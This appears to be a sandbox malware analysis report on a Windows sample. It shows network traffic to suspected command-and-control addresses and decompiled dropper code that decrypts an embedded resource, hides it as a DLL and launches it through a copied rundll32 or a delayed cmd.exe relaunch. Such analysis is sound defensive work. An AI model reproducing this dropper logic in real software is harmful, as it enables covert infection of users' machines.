Feb 8, 2023 12:00:33.289069891 CET	49771	80	192.168.2.3	202.108.0.52
Feb 8, 2023 12:00:34.062740088 CET	49765	6658	192.168.2.3	107.163.56.251
Feb 8, 2023 12:00:35.847755909 CET	49769	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 12:00:35.875395060 CET	49770	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 12:00:36.344181061 CET	49771	80	192.168.2.3	202.108.0.52
Feb 8, 2023 12:00:36.758208990 CET	49772	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 12:00:36.869148016 CET	49773	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 12:00:36.916143894 CET	49774	80	192.168.2.3	202.108.0.52
Feb 8, 2023 12:00:39.766365051 CET	49772	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 12:00:39.875749111 CET	49773	18963	192.168.2.3	107.163.56.232
Feb 8, 2023 12:00:39.922668934 CET	49774	80	192.168.2.3	202.108.0.52

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 8, 2023 11:59:06.480376959 CET	58921	53	192.168.2.3	8.8.8.8
Feb 8, 2023 11:59:06.835892916 CET	53	58921	8.8.8.8	192.168.2.3
Feb 8, 2023 11:59:10.831327915 CET	62704	53	192.168.2.3	8.8.8.8
Feb 8, 2023 11:59:11.086280107 CET	53	62704	8.8.8.8	192.168.2.3
Feb 8, 2023 11:59:14.891258001 CET	49977	53	192.168.2.3	8.8.8.8
Feb 8, 2023 11:59:15.231090069 CET	53	49977	8.8.8.8	192.168.2.3
Feb 8, 2023 11:59:18.956600904 CET	57840	53	192.168.2.3	8.8.8.8
Feb 8, 2023 11:59:19.218326092 CET	53	57840	8.8.8.8	192.168.2.3
Feb 8, 2023 11:59:23.089452982 CET	52387	53	192.168.2.3	8.8.8.8
Feb 8, 2023 11:59:23.107465982 CET	53	52387	8.8.8.8	192.168.2.3
Feb 8, 2023 11:59:27.534285069 CET	56924	53	192.168.2.3	8.8.8.8
Feb 8, 2023 11:59:27.890203953 CET	53	56924	8.8.8.8	192.168.2.3
Feb 8, 2023 11:59:31.230560064 CET	60625	53	192.168.2.3	8.8.8.8
Feb 8, 2023 11:59:31.542769909 CET	53	60625	8.8.8.8	192.168.2.3
Feb 8, 2023 11:59:35.208872080 CET	49302	53	192.168.2.3	8.8.8.8
Feb 8, 2023 11:59:35.226823092 CET	53	49302	8.8.8.8	192.168.2.3
Feb 8, 2023 11:59:39.332325935 CET	53975	53	192.168.2.3	8.8.8.8
Feb 8, 2023 11:59:39.350327015 CET	53	53975	8.8.8.8	192.168.2.3
Feb 8, 2023 11:59:44.862677097 CET	51139	53	192.168.2.3	8.8.8.8
Feb 8, 2023 11:59:45.200511932 CET	53	51139	8.8.8.8	192.168.2.3
Feb 8, 2023 11:59:47.588691950 CET	52955	53	192.168.2.3	8.8.8.8
Feb 8, 2023 11:59:47.606997967 CET	53	52955	8.8.8.8	192.168.2.3
Feb 8, 2023 11:59:51.632388115 CET	60582	53	192.168.2.3	8.8.8.8
Feb 8, 2023 11:59:51.650306940 CET	53	60582	8.8.8.8	192.168.2.3
Feb 8, 2023 11:59:55.668838978 CET	57134	53	192.168.2.3	8.8.8.8
Feb 8, 2023 11:59:55.688776970 CET	53	57134	8.8.8.8	192.168.2.3
Feb 8, 2023 11:59:59.681672096 CET	62050	53	192.168.2.3	8.8.8.8
Feb 8, 2023 11:59:59.701852083 CET	53	62050	8.8.8.8	192.168.2.3
Feb 8, 2023 12:00:05.353180885 CET	56042	53	192.168.2.3	8.8.8.8
Feb 8, 2023 12:00:05.371177912 CET	53	56042	8.8.8.8	192.168.2.3
Feb 8, 2023 12:00:08.033729076 CET	59636	53	192.168.2.3	8.8.8.8
Feb 8, 2023 12:00:08.370466948 CET	53	59636	8.8.8.8	192.168.2.3
Feb 8, 2023 12:00:12.268860102 CET	55638	53	192.168.2.3	8.8.8.8
Feb 8, 2023 12:00:12.286667109 CET	53	55638	8.8.8.8	192.168.2.3
Feb 8, 2023 12:00:16.194334984 CET	57704	53	192.168.2.3	8.8.8.8
Feb 8, 2023 12:00:16.214101076 CET	53	57704	8.8.8.8	192.168.2.3
Feb 8, 2023 12:00:20.243367910 CET	65320	53	192.168.2.3	8.8.8.8
Feb 8, 2023 12:00:20.261646986 CET	53	65320	8.8.8.8	192.168.2.3
Feb 8, 2023 12:00:24.919861078 CET	60767	53	192.168.2.3	8.8.8.8
Feb 8, 2023 12:00:24.939769030 CET	53	60767	8.8.8.8	192.168.2.3
Feb 8, 2023 12:00:28.990894079 CET	65107	53	192.168.2.3	8.8.8.8
Feb 8, 2023 12:00:29.229610920 CET	53	65107	8.8.8.8	192.168.2.3
Feb 8, 2023 12:00:32.947602987 CET	53848	53	192.168.2.3	8.8.8.8
Feb 8, 2023 12:00:33.286847115 CET	53	53848	8.8.8.8	192.168.2.3
Feb 8, 2023 12:00:36.895868063 CET	57571	53	192.168.2.3	8.8.8.8
Feb 8, 2023 12:00:36.913932085 CET	53	57571	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 8, 2023 11:59:06.480376959 CET	192.168.2.3	8.8.8.8	0x44fe	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)	false
Feb 8, 2023 11:59:10.831327915 CET	192.168.2.3	8.8.8.8	0x89fe	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)	false
Feb 8, 2023 11:59:14.891258001 CET	192.168.2.3	8.8.8.8	0x6945	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)	false
Feb 8, 2023 11:59:18.956600904 CET	192.168.2.3	8.8.8.8	0xe89d	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)	false
Feb 8, 2023 11:59:23.089452982 CET	192.168.2.3	8.8.8.8	0xe830	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)	false
Feb 8, 2023 11:59:27.534285069 CET	192.168.2.3	8.8.8.8	0x9208	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)	false
Feb 8, 2023 11:59:31.230560064 CET	192.168.2.3	8.8.8.8	0xb26f	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)	false
Feb 8, 2023 11:59:35.208872080 CET	192.168.2.3	8.8.8.8	0x799e	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)	false
Feb 8, 2023 11:59:39.332325935 CET	192.168.2.3	8.8.8.8	0xafd2	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)	false
Feb 8, 2023 11:59:44.862677097 CET	192.168.2.3	8.8.8.8	0x44a3	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)	false
Feb 8, 2023 11:59:47.588691950 CET	192.168.2.3	8.8.8.8	0x880b	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)	false
Feb 8, 2023 11:59:51.632388115 CET	192.168.2.3	8.8.8.8	0x5570	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)	false
Feb 8, 2023 11:59:55.668838978 CET	192.168.2.3	8.8.8.8	0xbcf	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)	false
Feb 8, 2023 11:59:59.681672096 CET	192.168.2.3	8.8.8.8	0x5980	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)	false
Feb 8, 2023 12:00:05.353180885 CET	192.168.2.3	8.8.8.8	0xe832	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)	false
Feb 8, 2023 12:00:08.033729076 CET	192.168.2.3	8.8.8.8	0x51b6	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)	false
Feb 8, 2023 12:00:12.268860102 CET	192.168.2.3	8.8.8.8	0xd4ac	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)	false
Feb 8, 2023 12:00:16.194334984 CET	192.168.2.3	8.8.8.8	0x4d0c	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)	false
Feb 8, 2023 12:00:20.243367910 CET	192.168.2.3	8.8.8.8	0xc5f0	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)	false
Feb 8, 2023 12:00:24.919861078 CET	192.168.2.3	8.8.8.8	0xae38	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)	false
Feb 8, 2023 12:00:28.990894079 CET	192.168.2.3	8.8.8.8	0xaede	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)	false
Feb 8, 2023 12:00:32.947602987 CET	192.168.2.3	8.8.8.8	0xff70	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)	false
Feb 8, 2023 12:00:36.895868063 CET	192.168.2.3	8.8.8.8	0x9ff0	Standard query (0)	blog.sina.com.cn	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Feb 8, 2023 11:59:06.835892916 CET	8.8.8.8	192.168.2.3	0x44fe	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)	false
Feb 8, 2023 11:59:06.835892916 CET	8.8.8.8	192.168.2.3	0x44fe	No error (0)	blogx.sina.com.cn		202.108.0.52	A (IP address)	IN (0x0001)	false
Feb 8, 2023 11:59:11.086280107 CET	8.8.8.8	192.168.2.3	0x89fe	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)	false
Feb 8, 2023 11:59:11.086280107 CET	8.8.8.8	192.168.2.3	0x89fe	No error (0)	blogx.sina.com.cn		202.108.0.52	A (IP address)	IN (0x0001)	false
Feb 8, 2023 11:59:15.231090069 CET	8.8.8.8	192.168.2.3	0x6945	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)	false
Feb 8, 2023 11:59:15.231090069 CET	8.8.8.8	192.168.2.3	0x6945	No error (0)	blogx.sina.com.cn		202.108.0.52	A (IP address)	IN (0x0001)	false
Feb 8, 2023 11:59:19.218326092 CET	8.8.8.8	192.168.2.3	0xe89d	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)	false
Feb 8, 2023 11:59:19.218326092 CET	8.8.8.8	192.168.2.3	0xe89d	No error (0)	blogx.sina.com.cn		202.108.0.52	A (IP address)	IN (0x0001)	false
Feb 8, 2023 11:59:23.107465982 CET	8.8.8.8	192.168.2.3	0xe830	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)	false
Feb 8, 2023 11:59:23.107465982 CET	8.8.8.8	192.168.2.3	0xe830	No error (0)	blogx.sina.com.cn		202.108.0.52	A (IP address)	IN (0x0001)	false
Feb 8, 2023 11:59:27.890203953 CET	8.8.8.8	192.168.2.3	0x9208	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)	false
Feb 8, 2023 11:59:27.890203953 CET	8.8.8.8	192.168.2.3	0x9208	No error (0)	blogx.sina.com.cn		202.108.0.52	A (IP address)	IN (0x0001)	false
Feb 8, 2023 11:59:31.542769909 CET	8.8.8.8	192.168.2.3	0xb26f	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)	false
Feb 8, 2023 11:59:31.542769909 CET	8.8.8.8	192.168.2.3	0xb26f	No error (0)	blogx.sina.com.cn		202.108.0.52	A (IP address)	IN (0x0001)	false
Feb 8, 2023 11:59:35.226823092 CET	8.8.8.8	192.168.2.3	0x799e	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)	false
Feb 8, 2023 11:59:35.226823092 CET	8.8.8.8	192.168.2.3	0x799e	No error (0)	blogx.sina.com.cn		202.108.0.52	A (IP address)	IN (0x0001)	false
Feb 8, 2023 11:59:39.350327015 CET	8.8.8.8	192.168.2.3	0xafd2	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)	false
Feb 8, 2023 11:59:39.350327015 CET	8.8.8.8	192.168.2.3	0xafd2	No error (0)	blogx.sina.com.cn		202.108.0.52	A (IP address)	IN (0x0001)	false
Feb 8, 2023 11:59:45.200511932 CET	8.8.8.8	192.168.2.3	0x44a3	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)	false
Feb 8, 2023 11:59:45.200511932 CET	8.8.8.8	192.168.2.3	0x44a3	No error (0)	blogx.sina.com.cn		202.108.0.52	A (IP address)	IN (0x0001)	false
Feb 8, 2023 11:59:47.606997967 CET	8.8.8.8	192.168.2.3	0x880b	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)	false
Feb 8, 2023 11:59:47.606997967 CET	8.8.8.8	192.168.2.3	0x880b	No error (0)	blogx.sina.com.cn		202.108.0.52	A (IP address)	IN (0x0001)	false
Feb 8, 2023 11:59:51.650306940 CET	8.8.8.8	192.168.2.3	0x5570	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)	false
Feb 8, 2023 11:59:51.650306940 CET	8.8.8.8	192.168.2.3	0x5570	No error (0)	blogx.sina.com.cn		202.108.0.52	A (IP address)	IN (0x0001)	false
Feb 8, 2023 11:59:55.688776970 CET	8.8.8.8	192.168.2.3	0xbcf	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)	false
Feb 8, 2023 11:59:55.688776970 CET	8.8.8.8	192.168.2.3	0xbcf	No error (0)	blogx.sina.com.cn		202.108.0.52	A (IP address)	IN (0x0001)	false
Feb 8, 2023 11:59:59.701852083 CET	8.8.8.8	192.168.2.3	0x5980	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)	false
Feb 8, 2023 11:59:59.701852083 CET	8.8.8.8	192.168.2.3	0x5980	No error (0)	blogx.sina.com.cn		202.108.0.52	A (IP address)	IN (0x0001)	false
Feb 8, 2023 12:00:05.371177912 CET	8.8.8.8	192.168.2.3	0xe832	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)	false
Feb 8, 2023 12:00:05.371177912 CET	8.8.8.8	192.168.2.3	0xe832	No error (0)	blogx.sina.com.cn		202.108.0.52	A (IP address)	IN (0x0001)	false
Feb 8, 2023 12:00:08.370466948 CET	8.8.8.8	192.168.2.3	0x51b6	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)	false
Feb 8, 2023 12:00:08.370466948 CET	8.8.8.8	192.168.2.3	0x51b6	No error (0)	blogx.sina.com.cn		202.108.0.52	A (IP address)	IN (0x0001)	false
Feb 8, 2023 12:00:12.286667109 CET	8.8.8.8	192.168.2.3	0xd4ac	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)	false
Feb 8, 2023 12:00:12.286667109 CET	8.8.8.8	192.168.2.3	0xd4ac	No error (0)	blogx.sina.com.cn		202.108.0.52	A (IP address)	IN (0x0001)	false
Feb 8, 2023 12:00:16.214101076 CET	8.8.8.8	192.168.2.3	0x4d0c	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)	false
Feb 8, 2023 12:00:16.214101076 CET	8.8.8.8	192.168.2.3	0x4d0c	No error (0)	blogx.sina.com.cn		202.108.0.52	A (IP address)	IN (0x0001)	false
Feb 8, 2023 12:00:20.261646986 CET	8.8.8.8	192.168.2.3	0xc5f0	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)	false
Feb 8, 2023 12:00:20.261646986 CET	8.8.8.8	192.168.2.3	0xc5f0	No error (0)	blogx.sina.com.cn		202.108.0.52	A (IP address)	IN (0x0001)	false
Feb 8, 2023 12:00:24.939769030 CET	8.8.8.8	192.168.2.3	0xae38	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)	false
Feb 8, 2023 12:00:24.939769030 CET	8.8.8.8	192.168.2.3	0xae38	No error (0)	blogx.sina.com.cn		202.108.0.52	A (IP address)	IN (0x0001)	false
Feb 8, 2023 12:00:29.229610920 CET	8.8.8.8	192.168.2.3	0xaede	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)	false
Feb 8, 2023 12:00:29.229610920 CET	8.8.8.8	192.168.2.3	0xaede	No error (0)	blogx.sina.com.cn		202.108.0.52	A (IP address)	IN (0x0001)	false
Feb 8, 2023 12:00:33.286847115 CET	8.8.8.8	192.168.2.3	0xff70	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)	false
Feb 8, 2023 12:00:33.286847115 CET	8.8.8.8	192.168.2.3	0xff70	No error (0)	blogx.sina.com.cn		202.108.0.52	A (IP address)	IN (0x0001)	false
Feb 8, 2023 12:00:36.913932085 CET	8.8.8.8	192.168.2.3	0x9ff0	No error (0)	blog.sina.com.cn	blogx.sina.com.cn		CNAME (Canonical name)	IN (0x0001)	false
Feb 8, 2023 12:00:36.913932085 CET	8.8.8.8	192.168.2.3	0x9ff0	No error (0)	blogx.sina.com.cn		202.108.0.52	A (IP address)	IN (0x0001)	false

Statistics

High Level Behavior Distribution

Click to dive into process behavior distribution

Disassembly

Reset < >

Analysis Process: 02hNixBIvP.exePID: 3332, Parent PID: 3452COMMON

Execution Graph

Execution Coverage:	1.7%
Dynamic/Decrypted Code Coverage:	14.6%
Signature Coverage:	33%
Total number of Nodes:	103
Total number of Limit Nodes:	5

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 70%

			E004013B9() {
				long _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				long _v24;
				void* _v39;
				void _v40;
				void* _v44;
				void* _v48;
				struct _STARTUPINFOA _v116;
				struct _PROCESS_INFORMATION _v132;
				char _v168;
				void _v427;
				char _v428;
				void _v687;
				char _v688;
				void _v947;
				char _v948;
				void _v1207;
				char _v1208;
				void _v1719;
				char _v1720;
				int _t108;
				void* _t136;
				signed int _t138;
				signed int _t139;
				signed int _t177;
				signed int _t194;
				signed int _t201;
				signed int _t202;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				struct HRSRC__* _t220;
				signed int _t222;
				void* _t243;
				void* _t245;
				void* _t251;
				void* _t252;
				void* _t254;
				void* _t257;

				_pop(_t219);
				_pop(_t241);
				_pop(_t191);
				_t252 = _t251 - 0x6b4;
				_t220 = FindResourceA(0, 0x82, "GUI");
				if(_t220 != 0) {
					_t243 = LoadResource(0, _t220);
					if(_t243 != 0) {
						_t108 = SizeofResource(0, _t220);
						_v8 = _t108;
						memcpy(_t243, LockResource(_t243), _t108);
						_v16 =  *_t243 & 0x000000ff;
						_t254 = _t252 + 0xc;
						_t222 = 0;
						_v12 =  *(_t243 + 1) & 0x000000ff;
						if(_v8 > 0) {
							do {
								asm("cdq");
								_t214 = 3;
								_t218 = _t222 % _t214;
								if(_t218 == 2) {
									 *((intOrPtr*)(_t243 + _t222)) =  *((intOrPtr*)(_t243 + _t222)) - _v16;
								}
								if(_t218 == 1) {
									 *((intOrPtr*)(_t243 + _t222)) =  *((intOrPtr*)(_t243 + _t222)) - _v12;
								}
								if(_t218 == 0) {
									 *((intOrPtr*)(_t243 + _t222)) =  *((intOrPtr*)(_t243 + _t222)) - _v12 + _v16;
								}
								_t222 = _t222 + 1;
							} while (_t222 < _v8);
						}
						_t194 = 0x40;
						_v428 = 0;
						_push(0x40);
						memset( &_v427, 0, _t194 << 2);
						asm("stosw");
						asm("stosb");
						_v688 = 0;
						memset( &_v687, 0, 0 << 2);
						asm("stosw");
						asm("stosb");
						_v40 = 0;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosw");
						asm("stosb");
						E0040107C( &_v40, 5);
						wsprintfA( &_v428, "d:\\Program Files\\%s",  &_v40);
						_t257 = _t254 + 0x2c;
						if(CreateDirectoryA( &_v428, 0) == 0) {
							wsprintfA( &_v428, "c:\\Program Files\\%s",  &_v40);
							_t257 = _t257 + 0xc;
							CreateDirectoryA( &_v428, 0);
						}
						Sleep(0x64);
						SetFileAttributesA( &_v428, 2);
						memset( &_v40, 0, 0x10);
						E0040107C( &_v40, 5);
						wsprintfA( &_v688, "%s\\%s.dll",  &_v428,  &_v40);
						_t136 = CreateFileA( &_v688, 0x40000000, 2, 0, 2, 0x80, 0);
						_v44 = _t136;
						WriteFile(_t136, _t243, _v8,  &_v24, 0);
						_t138 = rand();
						asm("cdq");
						_t139 = _t138 / 0xff;
						_t215 = _t138 % 0xff;
						_push(_t215);
						_v20 = _t215;
						L004151F6();
						_v48 = _t139;
						_t201 = _v20;
						if(_t201 > 0) {
							_v12 = 0xfa;
							_v8 = _t139;
							_v12 = _v12 - _t139;
							_v16 = _t201;
							do {
								_t177 = rand();
								asm("cdq");
								_v8 = _v8 + 1;
								_t67 =  &_v16;
								 *_t67 = _v16 - 1;
								 *_v8 = _t177 % (_v12 + _v8);
							} while ( *_t67 != 0);
						}
						_t245 = _v44;
						WriteFile(_t245, _v48, _v20,  &_v24, 0);
						SetFilePointer(_t245, 0, 0, 0);
						WriteFile(_t245, "MZ", 2,  &_v24, 0);
						CloseHandle(_t245);
						_t202 = 8;
						memcpy( &_v168, "c:\\windows\\system32\\rundll32.exe", _t202 << 2);
						asm("movsw");
						_push(0x40);
						_v948 = 0;
						memset( &_v947, 0, 0 << 2);
						asm("stosw");
						asm("stosb");
						memset( &_v40, 0, 0x10);
						E0040107C( &_v40, 3);
						wsprintfA( &_v948, "%s\\%s.exe",  &_v428,  &_v40);
						CopyFileA( &_v168,  &_v948, 0);
						_t206 = 0x7f;
						_v1720 = 0;
						_push(0x40);
						memset( &_v1719, 0, _t206 << 2);
						asm("stosw");
						asm("stosb");
						_v1208 = 0;
						memset( &_v1207, 0, 0 << 2);
						asm("stosw");
						asm("stosb");
						GetModuleFileNameA(0,  &_v1208, 0x104);
						wsprintfA( &_v1720, "%s \"%s\",Hlink %s",  &_v948,  &_v688,  &_v1208);
						_t210 = 0x10;
						memset( &(_v116.lpReserved), 0, _t210 << 2);
						_v116.cb = 0x44;
						_v116.lpDesktop = "WinSta0\\Default";
						_v116.wShowWindow = 0;
						CreateProcessA(0,  &_v1720, 0, 0, 0, 0, 0, 0,  &_v116,  &_v132);
						_push(1);
						_pop(0);
					} else {
						goto L3;
					}
				}
				return 0;
			}

0x004013b9
0x004013ba
0x004013bb
0x004013bf
0x004013db
0x004013df
0x004013e9
0x004013ed
0x004013f8
0x00401400
0x0040140b
0x00401413
0x00401416
0x0040141d
0x00401422
0x00401425
0x00401427
0x0040142b
0x0040142c
0x0040142d
0x00401432
0x00401437
0x00401437
0x0040143d
0x00401442
0x00401442
0x00401447
0x0040144f
0x0040144f
0x00401452
0x00401453
0x00401427
0x0040145c
0x00401463
0x00401469
0x0040146b
0x0040146d
0x0040146f
0x00401479
0x0040147f
0x00401481
0x00401483
0x00401489
0x0040148e
0x0040148f
0x00401490
0x00401491
0x00401493
0x00401498
0x004014b3
0x004014b5
0x004014c8
0x004014da
0x004014dc
0x004014e7
0x004014e7
0x004014ef
0x004014fe
0x0040150b
0x00401516
0x00401532
0x0040154e
0x00401562
0x00401567
0x0040156f
0x00401571
0x00401577
0x00401577
0x00401579
0x0040157a
0x0040157d
0x00401583
0x00401586
0x0040158b
0x0040158d
0x00401594
0x00401597
0x0040159a
0x0040159d
0x0040159d
0x004015a7
0x004015ad
0x004015b0
0x004015b0
0x004015b3
0x004015b3
0x0040159d
0x004015ba
0x004015c6
0x004015cc
0x004015df
0x004015e2
0x004015ef
0x004015f6
0x004015f8
0x004015fa
0x00401605
0x0040160d
0x0040160f
0x00401611
0x00401617
0x00401622
0x00401644
0x00401658
0x00401662
0x00401669
0x0040166f
0x00401671
0x00401673
0x00401675
0x0040167f
0x00401685
0x00401687
0x00401689
0x00401697
0x004016be
0x004016ca
0x004016cb
0x004016d0
0x004016ea
0x004016f1
0x004016f5
0x004016fb
0x004016fd
0x00000000
0x00000000
0x00000000
0x004013ed
0x00401702

APIs

FindResourceA.KERNEL32(00000000,00000082,GUI), ref: 004013D5
LoadResource.KERNEL32(00000000,00000000), ref: 004013E3
SizeofResource.KERNEL32(00000000,00000000), ref: 004013F8
LockResource.KERNEL32(00000000,00000000), ref: 00401403
memcpy.MSVCRT ref: 0040140B
wsprintfA.USER32 ref: 004014B3
CreateDirectoryA.KERNEL32(?,00000000), ref: 004014C0
wsprintfA.USER32 ref: 004014DA
CreateDirectoryA.KERNEL32(?,00000000), ref: 004014E7
Sleep.KERNEL32(00000064), ref: 004014EF
SetFileAttributesA.KERNEL32(?,00000002), ref: 004014FE

Strings

GUI, xrefs: 004013C8

Memory Dump Source

Source File: 00000000.00000002.259443485.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.259439860.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.259443485.000000000047B000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_02hNixBIvP.jbxd

Similarity

API ID: Resource$CreateDirectorywsprintf$AttributesFileFindLoadLockSizeofSleepmemcpy
String ID: GUI
API String ID: 3499318318-1113068146
Opcode ID: 2935683325844162e8379ffd8f7e88a60ce54dc87666410e4520308ef8b9b360
Instruction ID: 7681a7971a44aff1cfd63152e6ce6ab61ae4c3c5426a1299c50ffc8ee6258244
Opcode Fuzzy Hash: 2935683325844162e8379ffd8f7e88a60ce54dc87666410e4520308ef8b9b360
Instruction Fuzzy Hash: 07E086773443243BD22035BDACCDC973E9CC3C47A6B110837FA03E21D2A8794C4541A8

Uniqueness

Uniqueness Score: -1.00%

Function 00401194 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 183
sleepfileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E00401194() {
				long _v8;
				int _v12;
				void* _v16;
				void* _v20;
				int _v24;
				void* _v28;
				long _v32;
				void* _v47;
				char _v48;
				void _v307;
				char _v308;
				void _v567;
				char _v568;
				void _v827;
				char _v828;
				void _v1851;
				char _v1852;
				void* _t55;
				signed int _t66;
				void* _t77;
				int _t78;
				signed int _t97;
				intOrPtr _t99;
				intOrPtr _t100;
				void* _t106;
				signed int _t107;
				signed int _t111;
				void* _t120;
				int _t126;
				void* _t134;
				void* _t136;
				void* _t144;

				L004151F6(); // executed
				_t120 = _t55;
				_v20 = _t120;
				memset(_t120, 0, 0x100000);
				_v12 = 0;
				E004010DF(_t106, _t144, _t120,  *((intOrPtr*)( *((intOrPtr*)( *0x417284(0x100000))))),  &_v12); // executed
				_t136 = _t134 + 0x1c;
				_t145 =  *_t120 - 0x4d;
				if( *_t120 == 0x4d) {
					L2:
					_t107 = 0x40;
					_v308 = 0;
					_v48 = 0;
					memset( &_v307, 0, _t107 << 2);
					asm("stosw");
					asm("stosb");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosw");
					asm("stosb");
					E0040107C( &_v48, 5);
					_t66 = GetTickCount();
					_v8 = _t66 & 0x000001ff;
					_t111 = 0x40;
					_v568 = 0;
					memset( &_v567, 0, _t111 << 2);
					asm("stosw");
					asm("stosb");
					GetTempPathA(0x104,  &_v568);
					wsprintfA( &_v308, "%s\\%s.exe",  &_v568,  &_v48);
					_t77 = CreateFileA( &_v308, 0x40000000, 2, 0, 2, 0x80, 0); // executed
					_v16 = _t77;
					_t78 =  *0x417270(0);
					srand(_t78);
					_push(_v8);
					L004151F6();
					_t126 = _t78;
					_v24 = 0;
					_v28 = _t126;
					if(_v8 <= 0) {
						L4:
						Sleep(0x64); // executed
						WriteFile(_v16, _v20, _v12,  &_v32, 0); // executed
						Sleep(0x64); // executed
						WriteFile(_v16, _v28, _v8,  &_v32, 0); // executed
						FindCloseChangeNotification(_v16); // executed
						L004151EA();
						L004151EA(); // executed
						_v1852 = 0;
						memset( &_v1851, 0, 0xff << 2);
						asm("stosw");
						asm("stosb");
						_v828 = 0;
						memset( &_v827, 0, 0 << 2);
						asm("stosw");
						asm("stosb");
						_push( *((intOrPtr*)( *((intOrPtr*)( *0x417284(0x40, _v20, _v28))))));
						_push( &_v828);
						L004153C0();
						wsprintfA( &_v1852, "cmd.exe /c ping 127.0.0.1 -n 2&%s \"%s\"",  &_v308,  &_v828);
						WinExec( &_v1852, 0); // executed
						Sleep(0x1f4); // executed
						ExitProcess(0xffffffff);
					} else {
						goto L3;
					}
					do {
						L3:
						_t97 = rand();
						asm("cdq");
						_t99 = _v24;
						 *((char*)(_t99 + _t126)) = _t97 % 0xff - _t99;
						_t100 = _t99 + 1;
						_v24 = _t100;
					} while (_t100 < _v8);
					goto L4;
				} else {
					goto L1;
				}
				do {
					L1:
					E004010DF(_t106, _t145, _t120,  *((intOrPtr*)( *((intOrPtr*)( *0x417284())))),  &_v12);
					_t136 = _t136 + 0xc;
					Sleep(0x64);
				} while ( *_t120 != 0x4d);
				goto L2;
			}

0x004011a6
0x004011ad
0x004011b2
0x004011b5
0x004011c0
0x004011cf
0x004011da
0x004011dd
0x004011e0
0x00401202
0x00401206
0x0040120d
0x00401213
0x00401216
0x00401218
0x0040121a
0x00401220
0x00401221
0x00401222
0x00401223
0x00401225
0x0040122c
0x00401233
